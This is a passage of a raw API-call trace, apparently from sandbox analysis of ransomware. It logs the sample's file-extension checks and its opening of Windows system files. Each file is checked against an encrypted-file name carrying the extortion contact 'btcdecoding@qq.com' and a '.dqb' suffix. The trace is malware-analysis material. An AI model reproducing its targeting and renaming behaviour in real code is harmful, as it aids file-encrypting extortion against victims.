(lpString1=".pdf", lpString2=".bmp") returned 1 [0046.593] lstrlenW (lpString=".xls") returned 4 [0046.594] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString=".xlsx") returned 5 [0046.594] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0046.594] lstrlenW (lpString=".ppt") returned 4 [0046.594] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.594] lstrlenW (lpString=".zip") returned 4 [0046.594] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString=".rar") returned 4 [0046.594] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString=".bz2") returned 4 [0046.594] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString=".7z") returned 3 [0046.594] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0046.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.594] lstrlenW (lpString=".dbf") returned 4 [0046.594] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.594] lstrlenW (lpString=".1cd") returned 4 [0046.594] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0046.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.594] lstrlenW (lpString=".jpg") returned 4 [0046.594] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.594] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.594] lstrlenW (lpString=".doc") returned 4 [0046.594] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString=".docx") returned 5 [0046.594] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0046.594] lstrlenW (lpString=".pdf") returned 4 [0046.594] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString=".xls") returned 4 [0046.594] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0046.594] lstrlenW (lpString=".xlsx") returned 5 [0046.595] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0046.595] lstrlenW (lpString=".ppt") returned 4 [0046.595] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0046.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.595] lstrlenW (lpString=".zip") returned 4 [0046.595] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0046.595] lstrlenW (lpString=".rar") returned 4 [0046.595] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0046.595] lstrlenW (lpString=".bz2") returned 4 [0046.595] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0046.595] lstrlenW (lpString=".7z") returned 3 [0046.595] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0046.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.595] lstrlenW (lpString=".dbf") returned 4 [0046.595] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0046.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.595] lstrlenW (lpString=".1cd") returned 4 [0046.595] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0046.595] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51 [0046.595] lstrlenW (lpString=".jpg") returned 4 [0046.595] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0046.595] lstrcmpiW (lpString1=".inc", lpString2=".dqb") returned 1 [0046.595] lstrlenW (lpString="adojavas.inc") returned 12 [0046.595] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0046.597] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=14610) returned 1 [0046.597] CloseHandle (hObject=0x1dc) returned 1 [0046.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc")) returned 0x20 [0046.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.597] lstrlenW (lpString=".doc") returned 4 [0046.597] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0046.597] lstrlenW (lpString=".docx") returned 5 [0046.597] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0046.597] lstrlenW (lpString=".pdf") returned 4 [0046.597] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0046.597] lstrlenW (lpString=".xls") returned 4 [0046.597] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0046.597] lstrlenW (lpString=".xlsx") returned 5 [0046.597] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0046.597] lstrlenW (lpString=".ppt") returned 4 [0046.597] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0046.597] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.597] lstrlenW (lpString=".zip") returned 4 [0046.597] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0046.597] lstrlenW (lpString=".rar") returned 4 [0046.598] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0046.598] lstrlenW (lpString=".bz2") returned 4 [0046.598] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0046.598] lstrlenW (lpString=".7z") returned 3 [0046.598] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0046.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.598] lstrlenW (lpString=".dbf") returned 4 [0046.598] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0046.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.598] lstrlenW (lpString=".1cd") returned 4 [0046.598] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0046.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.598] lstrlenW (lpString=".jpg") returned 4 [0046.598] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0046.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.598] lstrlenW (lpString=".doc") returned 4 [0046.598] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0046.598] lstrlenW (lpString=".docx") returned 5 [0046.598] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0046.598] lstrlenW (lpString=".pdf") returned 4 [0046.598] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0046.598] lstrlenW (lpString=".xls") returned 4 [0046.598] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0046.598] lstrlenW (lpString=".xlsx") returned 5 [0046.598] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0046.598] lstrlenW (lpString=".ppt") returned 4 [0046.598] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0046.598] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.598] lstrlenW (lpString=".zip") returned 4 [0046.598] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0046.598] lstrlenW (lpString=".rar") returned 4 [0046.598] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0046.598] lstrlenW (lpString=".bz2") returned 4 [0046.598] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0046.598] lstrlenW (lpString=".7z") returned 3 [0046.599] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0046.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.599] lstrlenW (lpString=".dbf") returned 4 [0046.599] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0046.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.599] lstrlenW (lpString=".1cd") returned 4 [0046.599] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0046.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53 [0046.599] lstrlenW (lpString=".jpg") returned 4 [0046.599] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0046.599] lstrcmpiW (lpString1=".inc", lpString2=".dqb") returned 1 [0046.599] lstrlenW (lpString="adovbs.inc") returned 10 [0046.599] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1dc [0046.599] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=14951) returned 1 [0046.599] CloseHandle (hObject=0x1dc) returned 1 [0046.599] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc")) returned 0x20 [0046.599] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.599] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adovbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.600] lstrlenW (lpString=".doc") returned 4 [0046.600] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0046.600] lstrlenW (lpString=".docx") returned 5 [0046.600] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0046.600] lstrlenW (lpString=".pdf") returned 4 [0046.600] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0046.600] lstrlenW (lpString=".xls") returned 4 [0046.600] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0046.600] lstrlenW (lpString=".xlsx") returned 5 [0046.600] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0046.600] lstrlenW (lpString=".ppt") returned 4 [0046.600] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0046.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.600] lstrlenW (lpString=".zip") returned 4 [0046.600] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0046.600] lstrlenW (lpString=".rar") returned 4 [0046.600] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0046.600] lstrlenW (lpString=".bz2") returned 4 [0046.600] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0046.600] lstrlenW (lpString=".7z") returned 3 [0046.600] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0046.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.600] lstrlenW (lpString=".dbf") returned 4 [0046.600] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0046.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.600] lstrlenW (lpString=".1cd") returned 4 [0046.600] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0046.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.600] lstrlenW (lpString=".jpg") returned 4 [0046.600] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0046.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.600] lstrlenW (lpString=".doc") returned 4 [0046.600] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0046.601] lstrlenW (lpString=".docx") returned 5 [0046.601] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0046.601] lstrlenW (lpString=".pdf") returned 4 [0046.601] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0046.601] lstrlenW (lpString=".xls") returned 4 [0046.601] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0046.601] lstrlenW (lpString=".xlsx") returned 5 [0046.601] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0046.601] lstrlenW (lpString=".ppt") returned 4 [0046.601] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0046.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.601] lstrlenW (lpString=".zip") returned 4 [0046.601] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0046.601] lstrlenW (lpString=".rar") returned 4 [0046.601] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0046.601] lstrlenW (lpString=".bz2") returned 4 [0046.601] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0046.601] lstrlenW (lpString=".7z") returned 3 [0046.601] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0046.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.601] lstrlenW (lpString=".dbf") returned 4 [0046.601] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0046.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.601] lstrlenW (lpString=".1cd") returned 4 [0046.601] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0046.601] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adovbs.inc") returned 51 [0046.601] lstrlenW (lpString=".jpg") returned 4 [0046.601] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0046.601] lstrcmpiW (lpString1=".inc", lpString2=".dqb") returned 1 [0046.601] lstrlenW (lpString="adcjavas.inc") returned 12 [0046.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0046.740] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=630) returned 1 [0046.751] CloseHandle (hObject=0x1f8) returned 1 [0046.752] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc")) returned 0x20 [0046.755] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0046.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcjavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.760] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.764] lstrlenW (lpString=".doc") returned 4 [0046.765] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0046.772] lstrlenW (lpString=".docx") returned 5 [0046.773] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0046.774] lstrlenW (lpString=".pdf") returned 4 [0046.775] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0046.775] lstrlenW (lpString=".xls") returned 4 [0046.776] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0046.777] lstrlenW (lpString=".xlsx") returned 5 [0046.778] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0046.778] lstrlenW (lpString=".ppt") returned 4 [0046.779] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0046.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.782] lstrlenW (lpString=".zip") returned 4 [0046.783] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0046.784] lstrlenW (lpString=".rar") returned 4 [0046.785] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0046.786] lstrlenW (lpString=".bz2") returned 4 [0046.786] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0046.789] lstrlenW (lpString=".7z") returned 3 [0046.789] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0046.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.789] lstrlenW (lpString=".dbf") returned 4 [0046.789] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0046.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.789] lstrlenW (lpString=".1cd") returned 4 [0046.789] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0046.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.789] lstrlenW (lpString=".jpg") returned 4 [0046.789] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0046.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.789] lstrlenW (lpString=".doc") returned 4 [0046.789] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0046.789] lstrlenW (lpString=".docx") returned 5 [0046.789] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0046.789] lstrlenW (lpString=".pdf") returned 4 [0046.789] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0046.790] lstrlenW (lpString=".xls") returned 4 [0046.790] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0046.790] lstrlenW (lpString=".xlsx") returned 5 [0046.790] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0046.790] lstrlenW (lpString=".ppt") returned 4 [0046.790] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0046.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.790] lstrlenW (lpString=".zip") returned 4 [0046.790] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0046.790] lstrlenW (lpString=".rar") returned 4 [0046.790] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0046.790] lstrlenW (lpString=".bz2") returned 4 [0046.790] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0046.790] lstrlenW (lpString=".7z") returned 3 [0046.790] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0046.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.790] lstrlenW (lpString=".dbf") returned 4 [0046.790] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0046.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.790] lstrlenW (lpString=".1cd") returned 4 [0046.790] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0046.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned 55 [0046.790] lstrlenW (lpString=".jpg") returned 4 [0046.790] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0046.790] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0046.790] lstrlenW (lpString="203x8subpicture.png") returned 19 [0046.790] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0047.288] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=2820) returned 1 [0047.288] CloseHandle (hObject=0x180) returned 1 [0047.288] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png")) returned 0x20 [0047.288] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0047.288] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0047.288] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.288] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.288] lstrlenW (lpString=".doc") returned 4 [0047.288] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0047.288] lstrlenW (lpString=".docx") returned 5 [0047.288] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0047.288] lstrlenW (lpString=".pdf") returned 4 [0047.288] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0047.288] lstrlenW (lpString=".xls") returned 4 [0047.288] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0047.288] lstrlenW (lpString=".xlsx") returned 5 [0047.288] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0047.288] lstrlenW (lpString=".ppt") returned 4 [0047.289] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0047.289] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.289] lstrlenW (lpString=".zip") returned 4 [0047.289] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0047.289] lstrlenW (lpString=".rar") returned 4 [0047.289] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0047.289] lstrlenW (lpString=".bz2") returned 4 [0047.289] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0047.289] lstrlenW (lpString=".7z") returned 3 [0047.289] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0047.289] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.289] lstrlenW (lpString=".dbf") returned 4 [0047.289] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0047.289] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.289] lstrlenW (lpString=".1cd") returned 4 [0047.289] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0047.289] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.289] lstrlenW (lpString=".jpg") returned 4 [0047.289] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0047.289] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.289] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.289] lstrlenW (lpString=".doc") returned 4 [0047.289] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0047.289] lstrlenW (lpString=".docx") returned 5 [0047.289] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0047.289] lstrlenW (lpString=".pdf") returned 4 [0047.289] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0047.289] lstrlenW (lpString=".xls") returned 4 [0047.289] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0047.289] lstrlenW (lpString=".xlsx") returned 5 [0047.289] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0047.289] lstrlenW (lpString=".ppt") returned 4 [0047.289] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0047.289] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.290] lstrlenW (lpString=".zip") returned 4 [0047.290] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0047.290] lstrlenW (lpString=".rar") returned 4 [0047.290] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0047.290] lstrlenW (lpString=".bz2") returned 4 [0047.290] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0047.290] lstrlenW (lpString=".7z") returned 3 [0047.290] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0047.290] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.290] lstrlenW (lpString=".dbf") returned 4 [0047.290] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0047.290] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.290] lstrlenW (lpString=".1cd") returned 4 [0047.290] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0047.290] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0047.290] lstrlenW (lpString=".jpg") returned 4 [0047.290] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0047.290] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0047.290] lstrlenW (lpString="NavigationLeft_ButtonGraphic.png") returned 32 [0047.290] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" 